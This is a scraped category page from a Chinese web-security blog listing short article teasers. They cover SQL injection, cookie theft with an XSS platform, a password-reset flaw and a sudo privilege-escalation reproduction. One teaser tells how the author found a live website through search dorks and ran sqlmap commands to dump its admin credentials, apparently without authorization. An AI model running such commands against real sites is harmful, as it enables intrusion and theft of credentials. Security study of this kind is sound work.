echo ' <style>
    
    /* 新增动画库 */
.animate__animated {
  animation-duration: 0.5s;
}

/* 文章阅读量标签 */
.view-count {
  font-size: 12px;
  color: #666;
  margin-left: 8px;
  display: inline-flex;
  align-items: center;
}

.view-count .iconfont {
  font-size: 14px;
  margin-right: 4px;
} ';
    
</style><!doctype html>
<html lang="zh-cn">

<head>
    <!--51la统计-->
    <script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
    <script>LA.init({id:"3LaTBMpUHsIFZ3HE",ck:"3LaTBMpUHsIFZ3HE",autoTrack:true})</script>
    <!--51la统计-->
    <!--google统计-->
    <meta name="google-site-verification" content="vS2DgnujD7_Y0ge4oe6-MEZ7euUyZZ05Rx7SUTifWuc" />
    <!--google统计-->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <title>web漏洞</title>
  <meta name="keywords" content="web漏洞,web安全漏洞" />
  <meta name="description" content="web漏洞来自于系统的防护不足，或程序自身的设计不合理，包括sql注入、xss、csrf、文件上传等" />
  <link rel="shortcut icon" href="https://cesii.cn/content/templates/monie_jj/favicon.ico" type="image/x-icon">
  <link rel="alternate" title="RSS" href="https://cesii.cn/rss.php" type="application/rss+xml" />
  <link rel="stylesheet" href="//at.alicdn.com/t/c/font_4757084_yuqwbv4rpeg.css">
  
<link rel="stylesheet" href="https://cesii.cn/content/templates/monie_jj/dist/styles/main.074ac5d4.css">

  
  <!-- 统一了分类url和内容url -->
      <link rel="canonical" href="https://cesii.cn/web-safe" />
  </head>

<body>

  <header id="header" class="header">
    <div class="header_container">
      <div class="header_content">
        <div class="header_left">
          <a class="header_left_logo" href="https://cesii.cn/" target="_self" title="Deep testing">
            <img class="header_left_logo_pc" src="https://cesii.cn/content/uploadfile/202501/c89d1737138678.png" alt="https://cesii.cn/" loading="lazy">
            <img class="header_left_logo_mobile" src="https://cesii.cn/content/uploadfile/202501/c89d1737138848.png" alt="https://cesii.cn/" loading="lazy">
          </a>

          <nav class="header_left_nav">
            <div class="header_left_nav_mobile_menu_wrap">
              <div class="header_left_nav_mobile_menu"></div>
            </div>
            <ul class="header_nav_list">
                  
            </ul>
          </nav>
        </div>
        <div class="header_right">
          <div class="header_search_icon_wrap">
            <div class="header_search_icon" title="搜索">
              <i class="iconfont icon-sousuo"></i>
            </div>
          </div>
          <div class="header_search_wrap">
            <form class="header_search_form" action="/?keyword">
              <input id="header_search_input" class="header_search_input" type="text" name="keyword" placeholder="输入关键字搜索" autocomplete="off">
              <label for="header_search_input" class="header_search_btn" tabindex="0">
                <i class="iconfont icon-sousuo"></i>
              </label>
              <div class="search_history">
                <div class="search_history_head">
                  <span class="search-history-head-title">搜索历史</span>
                  <span class="search_history_clear_btn">清空</span>
                </div>
                <div class="search_history_list"></div>
              </div>
            </form>
<!--
            <a class="header_article_btn login" href="/admin/article.php?action=write" title="写文章">写文章</a>
          </div>
                      <button class="header-login-btn">登录</button>
                  </div>
      </div>
    </div>
  </header>

  <div class="mobile-search">
    <div class="mobile-search-mask"></div>
    <div class="mobile-search-content">
      <div class="mobile-search-close">
        <i class="iconfont icon-guanbi"></i>
      </div>
      <div class="mobile-search-body"></div>
    </div>
  </div>
  <nav class="nav">
        <div class="nav-container">
        <div class="nav-content">
            <div class="nav-list">
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/hostvlun">主机漏洞</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/python">Python</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/web-safe">web漏洞</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/web-service">Web服务</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/linux">Linux</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/jmeter">Jmeter</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/LoadRunner">LoadRunner</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/kali-Linux">Kali Linux</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/burpsuite">Burpsuite</a>
                                            </div>
                
                    <div class="nav-list-item nav-list-item-parent">
                        <a class="nav-list-item-parent-name" href="https://cesii.cn/docker">Docker</a>
                                            </div>
                            </div>
        </div>
    </div>
    <div class="nav-secondary-warp"></div>
  </nav>

  <!-- 其他页面内容 

  <script src="//cdn.jsdelivr.net/npm/lazyload@2.0.0-rc.2/lazyload.js"></script>
   -->
  <script>
    lazyload();
  </script>
 
</body>

</html>
<div class="main" role="main">
  <div class="container">
    <div class="main-content home-content">
      <div class="main-left">
        <div>
                  </div>
        <nav class="article-nav">
          <div class="article-nav-content">
            <a class="article-nav-item" href="javascript:;" target="_self" title="推荐">推荐</a>
            <a class="article-nav-item" href="javascript:;" target="_self" title="最新">最新</a>
            <span class="article-nav-line"></span>
          </div>
        </nav>
        <div class="article-skeleton">
          <div class="article-skeleton-line"></div>
          <div class="article-skeleton-line"></div>
          <div class="article-skeleton-line"></div>
          <div class="article-skeleton-line"></div>
        </div>

        <div class="article-card-wrap hidden">
                                    <article class="article-card animate__animated animate__fadeIn" data-link="https://cesii.cn/web-safe/114.html" itemscope="" itemtype="http://schema.org/BlogPosting">
                <a class="article-card-hidden-a" href="https://cesii.cn/web-safe/114.html" itemprop="url">意想不到的惊喜-某网站身份未授权漏洞</a>
                <div class="article-card-head">
                  <span class="article-card-user" itemprop="author">
                    <span itemprop="name" rel="author">cesii</span>
                  </span>
                  <time class="article-card-time" datetime="2025-2-7" itemprop="datePublished">2025-2-7</time>
                  <span class="article-card-category">
                                          </span>
                </div>
                <div class="article-card-body">
                  <div class="article-card-main">
                    <h2 class="article-card-title" itemprop="name headline">意想不到的惊喜-某网站身份未授权漏洞</h2>
                    <p class="article-card-desc" itemprop="articleBody">
                      好久没登录的x网站忘记了用户名，想着找回下结果发现了意向不到的惊喜。 正常逻辑下，当用户找回用户名时会将找回地址发送到对应的邮箱中，然后通过邮件中的找回地址重新设置， 实际上发现邮箱并没有收到邮件，而是将找回信息直接暴露在网页上，可以直接通过上面的找回地址重置用户名的密码，按照此方式只要知道网站的已知用户邮箱就可以做到重置其他用户的密码了。 漏洞已反馈至网站...                    </p>
                    <div class="article-card-footer">
                      <div class="article-card-footer-left" itemprop="interactionCount">
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-liulan article-card-footer-item-icon"></i>
                          <span>205</span>
                        </span>
                        <!--
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-dianzan article-card-footer-item-icon"></i>
                          <span>27</span>
                        </span>
                        -->
                        <a class="article-card-footer-item comments" href="https://cesii.cn/web-safe/114.html#comments" target="_blank" title="文章评论">
                          <i class="iconfont icon-pinglun article-card-footer-item-icon"></i>
                          <span>0</span>
                        </a>
                      </div>
                      <div class="article-card-footer-right">
                        <a class="article-card-tag" href="https://cesii.cn/tag/web%E6%BC%8F%E6%B4%9E"  title='标签' >web漏洞</a>                      </div>
                    </div>
                  </div>
                                      <div class="article-card-thumb">
                      <img class="article-card-thumb-img" src="https://www.mozhe.cn/uploads/2018/09/08/15363874175d97f4.jpg" alt="意想不到的惊喜-某网站身份未授权漏洞" loading="lazy">
                    </div>
                                  </div>
              </article>
                          <article class="article-card animate__animated animate__fadeIn" data-link="https://cesii.cn/web-safe/18.html" itemscope="" itemtype="http://schema.org/BlogPosting">
                <a class="article-card-hidden-a" href="https://cesii.cn/web-safe/18.html" itemprop="url">Sql注入漏洞实战记录</a>
                <div class="article-card-head">
                  <span class="article-card-user" itemprop="author">
                    <span itemprop="name" rel="author">cesii</span>
                  </span>
                  <time class="article-card-time" datetime="2024-9-3" itemprop="datePublished">2024-9-3</time>
                  <span class="article-card-category">
                                          </span>
                </div>
                <div class="article-card-body">
                  <div class="article-card-main">
                    <h2 class="article-card-title" itemprop="name headline">Sql注入漏洞实战记录</h2>
                    <p class="article-card-desc" itemprop="articleBody">
                      以往在练习sql注入漏洞的时候都是通过搭建靶站的方式进行的，靶站的东西再怎么反复练习也就那么回事了，要是真想有个效果还得来点实际的！
闲来无事上google再翻一翻，以前也翻过很多次，无奈技术菜没有找到什么适合我这种菜鸟水平的站来测试一波，真正的大佬都是个站就日的，不像我这种菜鸡，测试个网站还得东翻翻西找找…按照以往的方式还是用goole hacker的方式进行；因为以前找的站结构都是asp.net+win+iis架构的，对这个算是比较熟悉，所以这次用的语法还是这一套，输入hacker语法一顿向后翻页，前几页的不用想了，估计都被玩遍了
找了个网站进入后查看产品获取到链接地址：http://www.xxxxx.cn/show.asp?id=14
加个‘符号看看回显信息，发现返回了错误，再试试and 1 = 1 和 1 = 2看下回显，确认是带有sql注入漏洞了
因为水平菜，暂时还不能通过sql语句拼接的方式达到最终目的，所以只能用sqlmap工具一波流了…
获取数据库信息
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --dbs

验证数据库为Microsoft Access

获取数据库表
sqlmap -u http://www.xxxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –tables

获取表属性
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin --columns

获取表数据
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin –C username,password –dump

获取系统后台登录地址
后台通过gobuster工具获取后登录

看下了以往的日志，发现该网站从N年前就一直被别人攻，但是好像网站管理人员并不对此上心（也有可能此网站已经被弃用了），导致现在还有不断的访问日志产生
                    </p>
                    <div class="article-card-footer">
                      <div class="article-card-footer-left" itemprop="interactionCount">
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-liulan article-card-footer-item-icon"></i>
                          <span>424</span>
                        </span>
                        <!--
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-dianzan article-card-footer-item-icon"></i>
                          <span>27</span>
                        </span>
                        -->
                        <a class="article-card-footer-item comments" href="https://cesii.cn/web-safe/18.html#comments" target="_blank" title="文章评论">
                          <i class="iconfont icon-pinglun article-card-footer-item-icon"></i>
                          <span>0</span>
                        </a>
                      </div>
                      <div class="article-card-footer-right">
                        <a class="article-card-tag" href="https://cesii.cn/tag/sql%E6%B3%A8%E5%85%A5"  title='标签' >sql注入</a><a class="article-card-tag" href="https://cesii.cn/tag/sqlmap"  title='标签' >sqlmap</a>                      </div>
                    </div>
                  </div>
                                      <div class="article-card-thumb">
                      <img class="article-card-thumb-img" src="https://tse3-mm.cn.bing.net/th/id/OIP-C.t9PN22b2Nb8xNbuUtANSfgAAAA?rs=1&pid=ImgDetMain" alt="Sql注入漏洞实战记录" loading="lazy">
                    </div>
                                  </div>
              </article>
                          <article class="article-card animate__animated animate__fadeIn" data-link="https://cesii.cn/web-safe/34.html" itemscope="" itemtype="http://schema.org/BlogPosting">
                <a class="article-card-hidden-a" href="https://cesii.cn/web-safe/34.html" itemprop="url">CVE-2021-3156漏洞权限提升复现及修复</a>
                <div class="article-card-head">
                  <span class="article-card-user" itemprop="author">
                    <span itemprop="name" rel="author">cesii</span>
                  </span>
                  <time class="article-card-time" datetime="2022-9-7" itemprop="datePublished">2022-9-7</time>
                  <span class="article-card-category">
                                          </span>
                </div>
                <div class="article-card-body">
                  <div class="article-card-main">
                    <h2 class="article-card-title" itemprop="name headline">CVE-2021-3156漏洞权限提升复现及修复</h2>
                    <p class="article-card-desc" itemprop="articleBody">
                      以前从来没关注过服务器漏洞情况，近期事情不多想着修复下比较高危的安全漏洞，经过扫描发现有个CVE-2021-3156的权限提升漏洞，并且漏洞并且已经有了漏洞验证程序 以前从来没复现过漏洞 只想着怎么修复，这次就来学习下如何完整的复现漏洞漏洞判断 执行sudoedit -s  \  后： 出现sudoedit：”开头的错误，说明系统可能存在此安全风险。 不受...                    </p>
                    <div class="article-card-footer">
                      <div class="article-card-footer-left" itemprop="interactionCount">
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-liulan article-card-footer-item-icon"></i>
                          <span>161</span>
                        </span>
                        <!--
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-dianzan article-card-footer-item-icon"></i>
                          <span>27</span>
                        </span>
                        -->
                        <a class="article-card-footer-item comments" href="https://cesii.cn/web-safe/34.html#comments" target="_blank" title="文章评论">
                          <i class="iconfont icon-pinglun article-card-footer-item-icon"></i>
                          <span>0</span>
                        </a>
                      </div>
                      <div class="article-card-footer-right">
                        <a class="article-card-tag" href="https://cesii.cn/tag/linux"  title='标签' >linux</a><a class="article-card-tag" href="https://cesii.cn/tag/web%E6%BC%8F%E6%B4%9E"  title='标签' >web漏洞</a><a class="article-card-tag" href="https://cesii.cn/tag/cwe%E6%BC%8F%E6%B4%9E"  title='标签' >cwe漏洞</a>                      </div>
                    </div>
                  </div>
                                      <div class="article-card-thumb">
                      <img class="article-card-thumb-img" src="https://www.perforce.com/sites/default/files/image/2020-09/image-blog-what-is-cwe.jpg" alt="CVE-2021-3156漏洞权限提升复现及修复" loading="lazy">
                    </div>
                                  </div>
              </article>
                          <article class="article-card animate__animated animate__fadeIn" data-link="https://cesii.cn/web-safe/26.html" itemscope="" itemtype="http://schema.org/BlogPosting">
                <a class="article-card-hidden-a" href="https://cesii.cn/web-safe/26.html" itemprop="url">Web安全学习记录第一弹-无WAF的sql注入</a>
                <div class="article-card-head">
                  <span class="article-card-user" itemprop="author">
                    <span itemprop="name" rel="author">cesii</span>
                  </span>
                  <time class="article-card-time" datetime="2022-9-3" itemprop="datePublished">2022-9-3</time>
                  <span class="article-card-category">
                                          </span>
                </div>
                <div class="article-card-body">
                  <div class="article-card-main">
                    <h2 class="article-card-title" itemprop="name headline">Web安全学习记录第一弹-无WAF的sql注入</h2>
                    <p class="article-card-desc" itemprop="articleBody">
                      环境准备 靶站：http://rhiq8003.ia.aqlab.cn/ 测试工具：SqlMap 测试环境：kali2022 查看数据回显 id=1或id=1 and 1 = 1（语句成立）时返回正常数据 id=1或者或id=1 and 1 = 2（语句不成立）时返回数据异常，由此判定存在SQL注入漏洞 尝试获取测试靶站信息 sqlmap -u http:/...                    </p>
                    <div class="article-card-footer">
                      <div class="article-card-footer-left" itemprop="interactionCount">
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-liulan article-card-footer-item-icon"></i>
                          <span>192</span>
                        </span>
                        <!--
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-dianzan article-card-footer-item-icon"></i>
                          <span>27</span>
                        </span>
                        -->
                        <a class="article-card-footer-item comments" href="https://cesii.cn/web-safe/26.html#comments" target="_blank" title="文章评论">
                          <i class="iconfont icon-pinglun article-card-footer-item-icon"></i>
                          <span>0</span>
                        </a>
                      </div>
                      <div class="article-card-footer-right">
                        <a class="article-card-tag" href="https://cesii.cn/tag/sql%E6%B3%A8%E5%85%A5"  title='标签' >sql注入</a><a class="article-card-tag" href="https://cesii.cn/tag/web%E6%BC%8F%E6%B4%9E"  title='标签' >web漏洞</a>                      </div>
                    </div>
                  </div>
                                      <div class="article-card-thumb">
                      <img class="article-card-thumb-img" src="https://cesii.cn/content/uploadfile/202409/fe411725343948.png" alt="Web安全学习记录第一弹-无WAF的sql注入" loading="lazy">
                    </div>
                                  </div>
              </article>
                          <article class="article-card animate__animated animate__fadeIn" data-link="https://cesii.cn/web-safe/44.html" itemscope="" itemtype="http://schema.org/BlogPosting">
                <a class="article-card-hidden-a" href="https://cesii.cn/web-safe/44.html" itemprop="url">利用XSS平台获取cookie实现免登录</a>
                <div class="article-card-head">
                  <span class="article-card-user" itemprop="author">
                    <span itemprop="name" rel="author">cesii</span>
                  </span>
                  <time class="article-card-time" datetime="2021-9-10" itemprop="datePublished">2021-9-10</time>
                  <span class="article-card-category">
                                          </span>
                </div>
                <div class="article-card-body">
                  <div class="article-card-main">
                    <h2 class="article-card-title" itemprop="name headline">利用XSS平台获取cookie实现免登录</h2>
                    <p class="article-card-desc" itemprop="articleBody">
                      本次采用的XSS平台为清华大学开源出来的blue-lotus（蓝莲花） Js文件创建 首先在xss平台中创建需要获取cookie信息的js文件，模板选择default.js 更改地址 更改js文件中的地址为自己xss平台的ip地址（原理：通过访问js文件获取网站的cookie信息后输出到xss平台） 生成payload 点击生成payload后，可以看到pa...                    </p>
                    <div class="article-card-footer">
                      <div class="article-card-footer-left" itemprop="interactionCount">
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-liulan article-card-footer-item-icon"></i>
                          <span>192</span>
                        </span>
                        <!--
                        <span class="article-card-footer-item">
                          <i class="iconfont icon-dianzan article-card-footer-item-icon"></i>
                          <span>27</span>
                        </span>
                        -->
                        <a class="article-card-footer-item comments" href="https://cesii.cn/web-safe/44.html#comments" target="_blank" title="文章评论">
                          <i class="iconfont icon-pinglun article-card-footer-item-icon"></i>
                          <span>0</span>
                        </a>
                      </div>
                      <div class="article-card-footer-right">
                        <a class="article-card-tag" href="https://cesii.cn/tag/web%E6%BC%8F%E6%B4%9E"  title='标签' >web漏洞</a><a class="article-card-tag" href="https://cesii.cn/tag/xss"  title='标签' >xss</a>                      </div>
                    </div>
                  </div>
                                      <div class="article-card-thumb">
                      <img class="article-card-thumb-img" src="https://tse4-mm.cn.bing.net/th/id/OIP-C.Po2CWz0NeeB60zIW1_h07wHaDt?rs=1&pid=ImgDetMain" alt="利用XSS平台获取cookie实现免登录" loading="lazy">
                    </div>
                                  </div>
              </article>
                              </div>

        <div class="comment-pagination">
          <ol class="page-navigator">
                      </ol>
        </div>
      </div>

      <div class="main-right">
        <div class="column-small side-bar">
        <div class="aside_container article immersion-hide">
        <h3 class="sidebar_title">
            <i class="iconfont icon-huore"></i>
            热门文章        </h3>
        <div class="article_list">
            <ul class="list">
                                    <li class="item">
                        <span class="type_index">1</span>
                        <a class="link" href="https://cesii.cn/LoadRunner/24.html">
                            Loadrunner 12录制脚本时报错：The recorded script contains no steps                        </a>
                    </li>
                                    <li class="item">
                        <span class="type_index">2</span>
                        <a class="link" href="https://cesii.cn/61.html">
                            组合拳：Fiddler+Postman+AppScan，搞定C/S端软件漏洞扫描                        </a>
                    </li>
                                    <li class="item">
                        <span class="type_index">3</span>
                        <a class="link" href="https://cesii.cn/LoadRunner/3.html">
                            墙烈推荐的快速获取测试脚本方式：Fiddler抓包工具+LoadRunner12                        </a>
                    </li>
                                    <li class="item">
                        <span class="type_index">4</span>
                        <a class="link" href="https://cesii.cn/linux/16.html">
                            Linux命令之grep日志查询                        </a>
                    </li>
                                    <li class="item">
                        <span class="type_index">5</span>
                        <a class="link" href="https://cesii.cn/python/7.html">
                            Minio云存储平台文件上传python脚本示例                        </a>
                    </li>
                            </ul>
        </div>
    </div>
    <div class="aside_container tags immersion-hide">
        <h3 class="sidebar_title">
            <i class="iconfont icon-tag"></i>
            标签        </h3>
        <div class=" tags_list">
            <ul class="aside_list">
                                    <li class="link"><a href="https://cesii.cn/tag/kali" title="1 篇文章">kali</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/nmap" title="1 篇文章">nmap</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D" title="1 篇文章">永恒之蓝</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/chatgpt" title="1 篇文章">chatgpt</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/nmon" title="1 篇文章">nmon</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/.net" title="1 篇文章">.net</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/dvwa" title="2 篇文章">dvwa</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/windows" title="4 篇文章">windows</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/JpetStore" title="1 篇文章">JpetStore</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/curl" title="1 篇文章">curl</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/metasploit" title="1 篇文章">metasploit</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/hydra" title="1 篇文章">hydra</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/checkmarx" title="1 篇文章">checkmarx</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/LOIC" title="1 篇文章">LOIC</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/fiddler" title="1 篇文章">fiddler</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/%E9%98%B2%E7%81%AB%E5%A2%99" title="1 篇文章">防火墙</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F" title="4 篇文章">环境变量</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/jython" title="1 篇文章">jython</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/mysql" title="3 篇文章">mysql</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/jdk" title="1 篇文章">jdk</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/docker" title="4 篇文章">docker</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/tomcat" title="4 篇文章">tomcat</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/xss" title="1 篇文章">xss</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/XSS%E5%B9%B3%E5%8F%B0" title="2 篇文章">XSS平台</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/%E8%99%9A%E6%8B%9F%E6%9C%BA" title="1 篇文章">虚拟机</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/loadrunner%E9%94%99%E8%AF%AF" title="8 篇文章">loadrunner错误</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/cwe%E6%BC%8F%E6%B4%9E" title="2 篇文章">cwe漏洞</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/ip" title="1 篇文章">ip</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/scp" title="1 篇文章">scp</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/rad" title="1 篇文章">rad</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/web%E6%BC%8F%E6%B4%9E" title="5 篇文章">web漏洞</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/beef+xss" title="1 篇文章">beef xss</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/nginx" title="2 篇文章">nginx</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/ssh" title="2 篇文章">ssh</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/airmon-ng" title="1 篇文章">airmon-ng</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/wifi" title="1 篇文章">wifi</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/kali+linux" title="10 篇文章">kali linux</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/websocket" title="1 篇文章">websocket</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/sqlmap" title="4 篇文章">sqlmap</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/sql%E6%B3%A8%E5%85%A5" title="2 篇文章">sql注入</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/nodejs" title="2 篇文章">nodejs</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/tcp" title="2 篇文章">tcp</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/linux" title="19 篇文章">linux</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/burpsuite" title="2 篇文章">burpsuite</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/jmeter" title="10 篇文章">jmeter</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/%E7%BD%91%E7%BB%9C%E4%BB%A3%E7%90%86" title="1 篇文章">网络代理</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/mqtt" title="1 篇文章">mqtt</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/python" title="3 篇文章">python</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/loadrunner" title="10 篇文章">loadrunner</a></li>
                                    <li class="link"><a href="https://cesii.cn/tag/nessus" title="3 篇文章">nessus</a></li>
                            </ul>
        </div>
    </div>

    <div class="aside_container comments immersion-hide">
        <h3 class="sidebar_title">
            <i class="iconfont icon-pinglun"></i>
            最新评论        </h3>

        <div class="comments_list">
            <ul class="list">
                                    <li class="item">
                        <div class="user">

                            <div class="avatar yublog_user_avatar">
                                <img class="" src="//cravatar.cn/avatar/043de90c01bdec0971d73ce90843ab60?s=120" alt="hisir用户头像">
                            </div>
                            <div class="info">
                                <div class=""> hisir </div>
                                <span class="date">
                                    5 个月前                                </span>
                            </div>
                        </div>
                        <div class="reply">
                            <a class="link aside-reply-content" href="https://cesii.cn/110.html#33">
                                666                            </a>

                        </div>
                    </li>
                
            </ul>
        </div>
    </div>

</div>
      </div>
    </div>
  </div>
</div>

<style>
  /* 全局样式 */
  body {
    font-family: 'PingFang SC', 'Helvetica Neue', Arial, sans-serif;
    background: #f5f7fa;
    color: #333;
  }

  /* 卡片样式 */
  .article-card {
    background: #fff;
    border-radius: 12px;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
    transition: transform 0.3s ease, box-shadow 0.3s ease;
    margin-bottom: 6px;
    padding: 10px;
  }

  .article-card:hover {
    transform: translateY(-5px);
    box-shadow: 0 8px 12px rgba(0, 0, 0, 0.2);
  }

  /* 标题样式 */
  .article-card-title {
    margin-bottom: 5px;
  }

  /* 描述样式 */
  .article-card-desc {
    font-size: 1rem;
    color: #666;
    line-height: 1.6;
  }

  /* 底部样式 */
  .article-card-footer {
    display: flex;
    justify-content: space-between;
    align-items: center;
  }

  .article-card-footer-item {
    align-items: center;
    color: #666;
    margin-right: 15px;
  }

  .article-card-footer-item-icon {
    margin-right: 5px;
  }

  /* 分页样式 */
  .page-navigator {
    display: flex;
    justify-content: center;
    list-style: none;
    padding: 0;
  }

  .page-navigator li {
    margin: 0 5px;
  }

  .page-navigator a {
    border-radius: 5px;
    background: #f0f0f0;
    color: #333;
    text-decoration: none;
    transition: background 0.3s ease;
  }

  .page-navigator a:hover {
    background: #ddd;
  }
</style>

<script src="/content/templates/monie_jj/static/scripts/lazysizes.min.js"></script>
<script>
  // 图片懒加载
  document.addEventListener('DOMContentLoaded', function () {
    lazysizes.init();
  });
</script>


<script src="https://cesii.cn/content/templates/monie_jj/dist/scripts/main-manifest.ee83ce5a.js"></script>

<script src="https://cesii.cn/content/templates/monie_jj/dist/scripts/vendors.3a08bf66.js"></script>

<script src="https://cesii.cn/content/templates/monie_jj/dist/scripts/main.25ce9318.js"></script>


<footer class="footer">
  <!--Waves Container-->
  <div>
    <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
      viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
      <defs>
        <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
      </defs>
      <g class="parallax">
        <use xlink:href="#gentle-wave" x="48" y="0" fill="rgba(255,255,255,0.7" />
        <use xlink:href="#gentle-wave" x="48" y="3" fill="rgba(255,255,255,0.5)" />
        <use xlink:href="#gentle-wave" x="48" y="5" fill="rgba(255,255,255,0.3)" />
        <use xlink:href="#gentle-wave" x="48" y="7" fill="#fff" />
      </g>
    </svg>
  </div>
  <!--Waves end-->

  </div>
  <!--Header ends-->

  <!--Content starts-->
  <div class="footer-content content flex">
    <div class="footer_info">
        <!--
      <div class="footer-item">
        <a href="/about.html" target="_self" title="关于">关于</a>
        <a href="/links.html" target="_self" title="友链">友链</a>
        <a href="/rss.php" target="_blank" title="rss">rss</a>
      </div>
      -->
      <a href="https://cesii.cn/" title="cesii.cn"> Cesii ©2015 -2025<img src="https://cesii.cn/content/uploadfile/202501/e24a1737559607.png" title="戴眼镜的毛毛虫，来自90后时期的像素风，毛毛虫来自于测试，测试会产生bug，bug就是毛毛虫，毛毛虫因为近视眼要戴眼镜。">  
<a href="https://www.fujieace.com" title="付杰博客"><img src="https://cesii.cn/content/uploadfile/202409/91741725171975.png"><a> <a href="https://www.foreverblog.cn" target="_blank">  <img src="https://img.foreverblog.cn/logo_en_default.png" alt="" style="width:auto;height:16px;" title="十年之约" data-lazy-src="https://img.foreverblog.cn/logo_en_default.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img src="https://img.foreverblog.cn/logo_en_default.png" alt="" style="width:auto;height:16px;"title="十年之约"></noscript>    <a href="https://www.foreverblog.cn/go.html" target="_blank"> <img src="https://img.foreverblog.cn/wormhole_3_tp.gif" alt="" style="width:auto;height:32px;" title="穿梭虫洞-随机访问十年之约友链博客" data-lazy-src="https://img.foreverblog.cn/wormhole_3_tp.gif" data-ll-status="loaded" class="entered lazyloaded"><noscript><img src="https://img.foreverblog.cn/wormhole_3_tp.gif" alt="" style="width:auto;height:32px;" title="穿梭虫洞-随机访问十年之约友链博客"></noscript></a><a href="https://www.emlog.net/?ic=qpiFnC8e" target="_blank"><img src="https://cesii.cn/content/uploadfile/202502/d4fe1740036847.png" title="emlog驱动"></a>  <a target="_blank" title="51la网站统计" href="https://v6.51.la/land/3LaTBMpUHsIFZ3HE"><img src="https://sdk.51.la/icon/1-1.png"></a>
</a></a>
    </div>
